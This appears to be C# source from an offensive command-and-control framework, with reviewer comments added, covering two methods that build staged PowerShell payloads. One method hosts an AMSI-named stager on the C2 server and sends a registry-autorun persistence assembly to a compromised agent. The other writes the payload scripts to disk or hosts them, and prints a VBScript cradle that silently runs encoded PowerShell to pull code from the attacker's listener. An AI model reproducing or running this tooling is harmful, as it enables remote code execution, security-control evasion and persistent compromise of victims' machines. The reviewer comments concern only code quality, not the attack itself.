        /// <summary>
        /// Builds a staged PowerShell payload for the current HTTP agent, registers it as a
        /// web resource on the C2 server, and then sends a registry-autorun persistence
        /// assembly (pointing at the published URL) to the agent for execution.
        /// The whole body sits in a catch-all, so any failure — including the unchecked
        /// <c>(AgentInstanceHttp)agent</c> casts — is reduced to a single console line.
        /// NOTE(review): <c>keyname</c>, <c>reghive</c>, <c>ssl</c>, <c>encoded</c> and
        /// <c>agent</c> are presumably fields filled in by the command parser; not visible here.
        /// </summary>
        private void Run()
        {
            try
            {
                // NOTE(review): never read or written anywhere in this method.
                List <string> args = new List <string>();
                // Both the registry hive and the key name are required. When either is
                // missing the method returns silently — no message is printed.
                if (!string.IsNullOrEmpty(keyname) && !string.IsNullOrEmpty(reghive))
                {
                    //Create webresource
                    //Register web resource

                    // Templates are resolved relative to the process working directory,
                    // so the server must be started from the workspace root.
                    string         folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    // One random 10-character name is shared by every artefact produced below
                    // (<name>.dll, <name>.ps1, s2_<name>.ps1). A fresh System.Random per call
                    // gives best-effort uniqueness only; it is not a security boundary.
                    string         filename    = RandomAString(10, new Random()).ToLower();
                    // Unchecked downcasts: a non-HTTP agent throws InvalidCastException here,
                    // which the catch-all below reports as "[x] Error generating task".
                    ListenerConfig conf        = new ListenerConfig("",
                                                                    ((AgentInstanceHttp)agent).GetAddress(),
                                                                    ((AgentInstanceHttp)agent).GetPort(),
                                                                    Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()),
                                                                    ((AgentInstanceHttp)agent).GetProfileid());

                    // Stager source: template text with the listener profile and server key
                    // substituted in by Replacer.
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                    // Compile the stager to a DLL (returned base64-encoded).
                    string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");

                    // Decode -> compress -> re-encode; the compressed form is what the
                    // PowerShell generators embed.
                    byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                    string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                    // The agent-stage script needs the uncompressed length to size its buffer.
                    Dictionary <string, string> argagent = new Dictionary <string, string>();
                    argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                    string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;

                    // Normalise the profile's content URI to "segment/" (no leading slash,
                    // exactly one trailing slash) so it can be concatenated with a file name.
                    uricontent = uricontent.TrimStart('/');

                    if (!uricontent.EndsWith("/"))
                    {
                        uricontent += "/";
                    }

                    // Placeholders for the first-stage script; "#{uri}" points at the
                    // second-stage resource registered as "s2_<name>.ps1" below.
                    Dictionary <string, string> arg = new Dictionary <string, string>
                    {
                        { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
                        { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
                        { "#{uri}", uricontent + "s2_" + filename + ".ps1" }
                    };

                    PowershellAmsiGenerator  gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                    PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                    //Add resource to webserver storage
                    C2Manager c2manager = Program.GetC2Manager();

                    // Two resources are published: stage 1 at "<name>.ps1" and stage 2 at
                    // "s2_<name>.ps1". Nothing here unregisters them later.
                    c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
                    c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
                    Console.WriteLine("[*] Resource added to webserver resources");

                    // Scheme follows the listener's TLS setting.
                    string proto = "";

                    if (ssl)
                    {
                        proto = "https";
                    }
                    else
                    {
                        proto = "http";
                    }

                    // Full URL of the stage-1 resource; this is what gets baked into the
                    // autorun value.
                    string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");

                    // Persistence source: autorun template with hive, key name, URL and the
                    // 'encoded' flag substituted in.
                    string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSAUTORUN_TEMPLATE));

                    perssrc = Replacer.ReplacePersAutorun(perssrc, reghive, url, keyname, encoded);

                    // Compile the persistence assembly in memory (a second random .dll name,
                    // unrelated to 'filename'), gzip it, base64 it, and hand it to the agent
                    // with entry point "PersAutorun" and a single blank argument.
                    RunAssemblyBase64(
                        Convert.ToBase64String(
                            CompressGZipAssembly(
                                Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.SSploitPersistence)
                                )
                            ),
                        "PersAutorun",
                        new string[] { " " },
                        agent);

                    // Redundant: this is already the last statement of the block.
                    return;
                }
            }
            catch (Exception e)
            {
                // Catch-all: only the message is printed, so the exception type and stack
                // trace are lost. File-not-found, cast and compile errors all land here.
                Console.WriteLine("[x] Error generating task {0}", e.Message);
            }
        }
        /// <summary>
        /// Builds the staged PowerShell payload for an explicit listener (<c>lhost</c>,
        /// <c>lport</c>, <c>profile</c>) and either publishes it on the C2 web server
        /// (<c>hosted</c>) or writes the two scripts into the OS temp directory.
        /// Returns silently when the arguments are incomplete or the profile id is unknown;
        /// any exception is reduced to a single console line by the catch-all.
        /// NOTE(review): <c>filename</c>, <c>lhost</c>, <c>lport</c>, <c>profile</c> and
        /// <c>hosted</c> are presumably fields filled in by the command parser; not visible here.
        /// </summary>
        private void Run()
        {
            // NOTE(review): never read or written anywhere in this method.
            List <string> args = new List <string>();

            try
            {
                // Argument guard. No message is printed on the early return, so a typo in
                // the command simply produces no output.
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    // Templates are resolved relative to the process working directory.
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    // Unknown profile ids fall through without any output (there is no else).
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        // Stager source: template text with the listener profile and server
                        // key substituted in by Replacer. Unlike the agent-driven variant,
                        // 'filename' is used verbatim here — no ".ps1" / ".dll" is appended.
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        // Compile the stager to a DLL (returned base64-encoded).
                        string assemblyBase64 = Builder.GenerateDllBase64(source, filename);

                        // Placeholders shared by the cradle (gen_s0) and stage-1 (gen_s1) scripts.
                        Dictionary <string, string> arg = new Dictionary <string, string>();
                        arg.Add("#{lhost}", lhost);
                        arg.Add("#{lport}", lport.ToString());

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                        // Normalise the profile's content URI to "segment/" (no leading slash,
                        // exactly one trailing slash) so it can be concatenated with a file name.
                        uricontent = uricontent.TrimStart('/');

                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        // "#{uri}" points at the second-stage resource "s2_<filename>".
                        arg.Add("#{uri}", uricontent + "s2_" + filename);

                        // Decode -> compress -> re-encode; the compressed form is what the
                        // PowerShell generators embed.
                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                        // The agent-stage script needs the uncompressed length to size its buffer.
                        Dictionary <string, string> argagent = new Dictionary <string, string>();
                        argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                        // Three generators: s0 is only used for the printed cradle example,
                        // s1/s2 are the artefacts that get hosted or written to disk.
                        PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                        PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                        PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();

                            // Publishes "<filename>" (stage 1) and "s2_<filename>" (stage 2).
                            // Nothing here unregisters them later.
                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
                            c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            // NOTE(review): the scheme is hard-coded to https here, whereas the
                            // agent-driven variant derives it from the listener's TLS flag; the
                            // printed URL may be wrong for a plain-http listener — confirm.
                            Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                            Console.WriteLine("[*]");
                            Console.WriteLine("[*] Cradle example");
                            Console.WriteLine("[*]");
                            // Informational only: prints a VBScript snippet that embeds the
                            // cradle script (gen_s0) as an encoded PowerShell command line.
                            // The literal quotes below are part of the emitted text.
                            Console.WriteLine("<script language = \"VBScript\">");
                            Console.WriteLine("    Function etaget()");
                            Console.WriteLine("");
                            Console.WriteLine("        Dim ahsten");
                            Console.WriteLine("        Set ahsten = CreateObject(\"Wscript.Shell\")");
                            Console.WriteLine("        ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
                            Console.WriteLine("    End Function");
                            Console.WriteLine("");
                            Console.WriteLine("    etaget");
                            Console.WriteLine("    self.close");
                            Console.WriteLine("</script>");
                            Console.WriteLine("[*]");
                            return;
                        }
                        else
                        {
                            //Write file to tmp env dir
                            // Non-hosted mode: both scripts are written under Path.GetTempPath()
                            // with their plain names and left there; existing files of the same
                            // name are overwritten.
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());

                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
                        }
                    }
                }
            }
            catch (Exception e)
            {
                // Catch-all: only the message is printed (with an "[*]" rather than "[x]"
                // prefix, unlike the sibling Run), so the exception type and stack trace
                // are lost. File-not-found and compile errors all land here.
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }